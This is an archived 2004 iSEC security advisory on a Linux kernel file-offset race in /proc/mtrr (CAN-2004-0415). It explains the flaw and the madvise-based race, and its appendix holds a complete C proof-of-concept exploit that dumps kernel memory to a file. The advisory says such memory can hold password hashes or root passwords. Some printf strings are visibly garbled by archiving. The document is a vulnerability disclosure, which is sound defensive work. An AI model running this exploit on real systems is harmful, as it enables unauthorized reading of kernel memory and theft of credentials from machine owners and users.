<<< Date Index >>>     <<< Thread Index >>>

Linux kernel file offset pointer races



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Synopsis:  Linux kernel file offset pointer handling
Product:   Linux kernel
Version:   2.4 up to to and including 2.4.26, 2.6 up to to and
           including 2.6.7
Vendor:    http://www.kernel.org/
URL:       http://isec.pl/vulnerabilities/isec-0016-procleaks.txt
CVE:       CAN-2004-0415
Author:    Paul Starzetz <ihaquer@xxxxxxx>
Date:      Aug 04, 2004



Issue:
======

A  critical  security  vulnerability  has been found in the Linux kernel
code handling 64bit file offset pointers.


Details:
========

The  Linux  kernel  offers  a  file  handling  API   to   the   userland
applications.  Basically  a  file  can  be identified by a file name and
opened through the open(2) system call which  in  turn  returns  a  file
descriptor for the kernel file object.

One  of  the  properties  of  the  file object is something called 'file
offset' (f_pos member variable of the file object), which is advanced if
one  reads  or  writtes  to the file. It can also by changed through the
lseek(2) system call and identifies the current writing/reading position
inside the file image on the media.

There  are two different versions of the file handling API inside recent
Linux kernels: the old 32 bit and the new (LFS)  64  bit  API.  We  have
identified  numerous places, where invalid conversions from 64 bit sized
file offsets to 32 bit ones as well  as  insecure  access  to  the  file
offset member variable take place.

We  have  found that most of the /proc entries (like /proc/version) leak
about one page of unitialized kernel memory  and  can  be  exploited  to
obtain sensitive data.

We  have  found  dozens  of places with suspicious or bogus code. One of
them resides in the MTRR handling code for the i386 architecture:


static ssize_t mtrr_read(struct file *file, char *buf, size_t len,
                         loff_t *ppos)
{
[1] if (*ppos >= ascii_buf_bytes) return 0;
[2] if (*ppos + len > ascii_buf_bytes) len = ascii_buf_bytes - *ppos;
    if ( copy_to_user (buf, ascii_buffer + *ppos, len) ) return -EFAULT;
[3] *ppos += len;
    return len;
}   /*  End Function mtrr_read  */


It is quite easy to see that since copy_to_user can  sleep,  the  second
reference  to  *ppos  may  use  another  value.  Or in other words, code
operating on the file->f_pos variable through a pointer must  be  atomic
in  respect  to  the current thread. We expect even more troubles in the
SMP case though.


Exploitation:
=============

In the following we want to concentrate onto the mttr.c code, however we
think  that  also  other  f_pos  handling  code  in  the  kernel  may be
exploitable.

The idea is to use the blocking property of copy_to_user to advance  the
file->f_pos  file  offset  to  be negative allowing us to bypass the two
checks marked with [1] and [2] in the above code.

There are two situation where copy_to_user() will sleep if there  is  no
page  table entry for the corresponding location in the user buffer used
to receive the data:

- - the underlying buffer maps a file which is  not  in  the  kernel  page
cache yet. The file content must be read from the disk first

- -  the mmap_sem semaphore of the process's VM is in a closed state, that
is another thread sharing  the  same  VM  caused  a  down_write  on  the
semaphore.

We  use the second method as follows. One of two threads sharing same VM
issues a madvise(2) call on a VMA that maps some, sufficiently big  file
setting  the  madvise  flag to WILLNEED. This will issue a down_write on
the mmap semaphore and schedule a  read-ahead  request  for  the  mmaped
file.

Second thread issues in the mean time a read on the /proc/mtrr file thus
going for sleep until the first thread returns from the  madvise  system
call.  The  two threads will be woken up in a FIFO manner thus the first
thread will run as first and can advance the file pointer  of  the  proc
file  to  the  maximum  possible  value  of 0x7fffffffffffffff while the
second thread is still waiting in the scheduler queue for CPU  (itn  the
non-SMP case).

After  the  place  marked  with [3] has been executed, the file position
will have a negative value and the checks [1] and [2] can be passed  for
any  buffer  length  supplied,  thus  leaking the kernel memory from the
address of ascii_buffer on to the user space.

We have attached a proof-of-concept exploit code  to  read  portions  of
kernel  memory.  Another  exploit  code  we have at our disposal can use
other /proc entries (like /proc/version) to  read  one  page  of  kernel
memory.


Impact:
=======

Since no special privileges are required to open the /proc/mtrr file for
reading any process may exploit the bug to read  huge  parts  of  kernel
memory.

The  kernel  memory  dump  may  include  very sensitive information like
hashed passwords from /etc/shadow or even the root passwort.

We have found in an experiment that after the root user logged in  using
ssh  (in our case it was OpenSSH using PAM), the root passwort was keept
in kernel memory. This is very suprising since sshd will  quickly  clean
(overwrite  with  zeros)  the memory portion used to store the password.
But the password may have made its way through various kernel paths like
pipes or sockets.

Tested  and known to be vulnerable kernel versions are all <= 2.4.26 and
<= 2.6.7. All users are encouraged to patch all  vulnerable  systems  as
soon  as appropriate vendor patches are released. There is no hotfix for
this vulnerability.


Credits:
========

Paul Starzetz <ihaquer@xxxxxxx> has  identified  the  vulnerability  and
performed  further  research. COPYING, DISTRIBUTION, AND MODIFICATION OF
INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH  EXPRESS  PERMISSION  OF
ONE OF THE AUTHORS.


Disclaimer:
===========

This  document and all the information it contains are provided "as is",
for educational purposes only, without warranty  of  any  kind,  whether
express or implied.

The  authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of  the  information   provided  in
this  document.  Liability  claims regarding damage caused by the use of
any information provided, including any kind  of  information  which  is
incomplete or incorrect, will therefore be rejected.


Appendix:
=========

/*
 *
 *  /proc ppos kernel memory read (semaphore method)
 *
 *  gcc -O3 proc_kmem_dump.c -o proc_kmem_dump
 *
 *  Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
 *
 *  THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 *  AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 *  WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 */


#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <sched.h>

#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>
#include <sys/mman.h>

#include <linux/unistd.h>

#include <asm/page.h>


//  define machine mem size in MB
#define MEMSIZE 64



_syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res,
          uint, wh);



void fatal(const char *msg)
{
    printf("0);
    if(!errno) {
        fprintf(stderr, "FATAL ERROR: %s0, msg);
    }
    else {
        perror(msg);
    }

    printf("0);
    fflush(stdout);
    fflush(stderr);
    exit(31337);
}


static int cpid, nc, fd, pfd, r=0, i=0, csize, fsize=1024*1024*MEMSIZE,
           size=PAGE_SIZE, us;
static volatile int go[2];
static loff_t off;
static char *buf=NULL, *file, child_stack[PAGE_SIZE];
static struct timeval tv1, tv2;
static struct stat st;


//  child close sempahore & sleep
int start_child(void *arg)
{
//  unlock parent & close semaphore
    go[0]=0;
    madvise(file, csize, MADV_DONTNEED);
    madvise(file, csize, MADV_SEQUENTIAL);
    gettimeofday(&tv1, NULL);
    read(pfd, buf, 0);

    go[0]=1;
    r = madvise(file, csize, MADV_WILLNEED);
    if(r)
        fatal("madvise");

//  parent blocked on mmap_sem? GOOD!
    if(go[1] == 1 || _llseek(pfd, 0, 0, &off, SEEK_CUR)<0 ) {
        r = _llseek(pfd, 0x7fffffff, 0xffffffff, &off, SEEK_SET);
            if( r == -1 )
                fatal("lseek");
        printf("0 Race won!"); fflush(stdout);
        go[0]=2;
    } else {
        printf("0 Race lost %d, use another file!0, go[1]);
        fflush(stdout);
        kill(getppid(), SIGTERM);
    }
    _exit(1);

return 0;
}


void usage(char *name)
{
    printf("0SAGE: %s <file not in cache>", name);
    printf("0);
    exit(1);
}


int main(int ac, char **av)
{
    if(ac<2)
        usage(av[0]);

//  mmap big file not in cache
    r=stat(av[1], &st);
    if(r)
        fatal("stat file");
    csize = (st.st_size + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1);

    fd=open(av[1], O_RDONLY);
    if(fd<0)
        fatal("open file");
    file=mmap(NULL, csize, PROT_READ, MAP_SHARED, fd, 0);
    if(file==MAP_FAILED)
        fatal("mmap");
    close(fd);
    printf("0 mmaped uncached file at %p - %p", file, file+csize);
    fflush(stdout);

    pfd=open("/proc/mtrr", O_RDONLY);
    if(pfd<0)
        fatal("open");

    fd=open("kmem.dat", O_RDWR|O_CREAT|O_TRUNC, 0644);
    if(fd<0)
        fatal("open data");

    r=ftruncate(fd, fsize);
    if(r<0)
        fatal("ftruncate");

    buf=mmap(NULL, fsize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
    if(buf==MAP_FAILED)
        fatal("mmap");
    close(fd);
    printf("0 mmaped kernel data file at %p", buf);
    fflush(stdout);

//  clone thread wait for child sleep
    nc = nice(0);
    cpid=clone(&start_child, child_stack + sizeof(child_stack)-4,
           CLONE_FILES|CLONE_VM, NULL);
    nice(19-nc);
    while(go[0]==0) {
        i++;
    }

//  try to read & sleep & move fpos to be negative
    gettimeofday(&tv1, NULL);
    go[1] = 1;
    r = read(pfd, buf, size );
    go[1] = 2;
    gettimeofday(&tv2, NULL);
    if(r<0)
        fatal("read");
    while(go[0]!=2) {
        i++;
    }

    us = tv2.tv_sec - tv1.tv_sec;
    us *= 1000000;
    us += (tv2.tv_usec - tv1.tv_usec) ;

    printf("0 READ %d bytes in %d usec", r, us); fflush(stdout);
    r = _llseek(pfd, 0, 0, &off, SEEK_CUR);
    if(r < 0 ) {
        printf("0 SUCCESS, lseek fails, reading kernel mem...0);
        fflush(stdout);
        i=0;
        for(;;) {
            r = read(pfd, buf, PAGE_SIZE );
            if(r!=PAGE_SIZE)
                break;
            buf += PAGE_SIZE;
            i++;        PAGE %6d", i); fflush(stdout);
            printf("
        }
        printf("0 done, err=%s", strerror(errno) );
        fflush(stdout);
    }
    close(pfd);

    printf("0);
    sleep(1);
    kill(cpid, 9);

return 0;
}


- -- 
Paul Starzetz
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQFBELj2C+8U3Z5wpu4RAgZZAKC8SxT6m4XMoU1koNfFLbf1Vfj32wCgubCT
k2SjwaZ3U2CsOQmcvjRr1IA=
=hIiM
-----END PGP SIGNATURE-----